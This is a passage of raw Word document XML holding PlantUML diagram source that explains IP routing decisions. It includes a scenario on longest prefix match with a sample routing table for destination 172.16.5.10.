                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A5F4C54" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45000982" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D7995A5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C6EB77B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>legend right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E81A9AC" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightSkyBlue = taken path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F5709F8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray    = not taken</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09264ACF" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endlegend</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D10A744" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="46CB86ED" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10583557" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>– Multiple Matches, Use Longest Prefix Match</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23030B0C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="7C1BE715" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09041B73" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095633E0" wp14:editId="4B10DF08">
                  <wp:extent cx="8569063" cy="6009254"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="734938131"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5308" cy="6013634"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D9DCD16" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D1BBAE" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam monochrome false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E19D142" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam activity {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7DC304" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BackgroundColor white</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AF5BFA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BorderColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50685279" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  FontColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D30BED4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6215A0CF" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72C6FE36" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>title Routing Decision – Multiple Matches → Longest Prefix Match</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571355BA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BCCA101" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14497470" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Packet arrives with destination IP (172.16.5.10);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6104B4B1" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C94D97F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Extract destination IP from packet header;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4568A5E4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AB103FA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Search routing table for matching entries;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53F27A17" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1842B041" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="517076AB" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>&lt;color:green&gt;Sample Routing Table:&lt;/color&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62855BC8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="311EE372" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>&lt;color:green&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09085373" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Destination       Gateway             Genmask         Flags Metric Ref Use Iface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F761DC0" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>0.0.0.0               192.168.1.254   0.0.0.0         UG    100    0   152 eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1160005B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>172.16.0.0         192.168.1.254   255.255.0.0     UG    75     0     5 eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AFA5FFA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>172.16.5.0         0.0.0.0               255.255.255.0   U     10     0    50 eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6240C725" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>172.16.5.10       192.168.1.254   255.255.255.255 UGH   5      0    20 eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A24C1A9" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>&lt;/color&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F266DD4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2050140B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B1D9C0C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Multiple matches found;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F85F15" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4864A9F4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D8E342" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">Why multiple matches?  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13935137" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">- Destination 172.16.5.10 matches:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159F7696" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    Destination     Netmask                 Prefix length</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21951689" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    0.0.0.0            0.0.0.0                    /0                  default route  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8E4887" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    172.16.0.0      255.255.0.0            /16                network route  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40815D2D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    172.16.5.0      255.255.255.0        /24                subnet route  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE0642F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    172.16.5.10    255.255.255.255    /32                host route  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64703AEF" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>- Router always collects **all** matches before applying LPM.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4091D730" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F929A6" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32BF9DA5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Apply Longest Prefix Match rule;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0FA2B2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EE18C1C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>if (Equal prefix length?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC8FB58" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray :Compare metric / admin distance;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="125F2B79" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681385E4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  This happens only if two or more routes  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500459DD" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  have the **same** longest prefix length.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F84B8D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  Example: two /24 routes via different gateways.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D773903" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
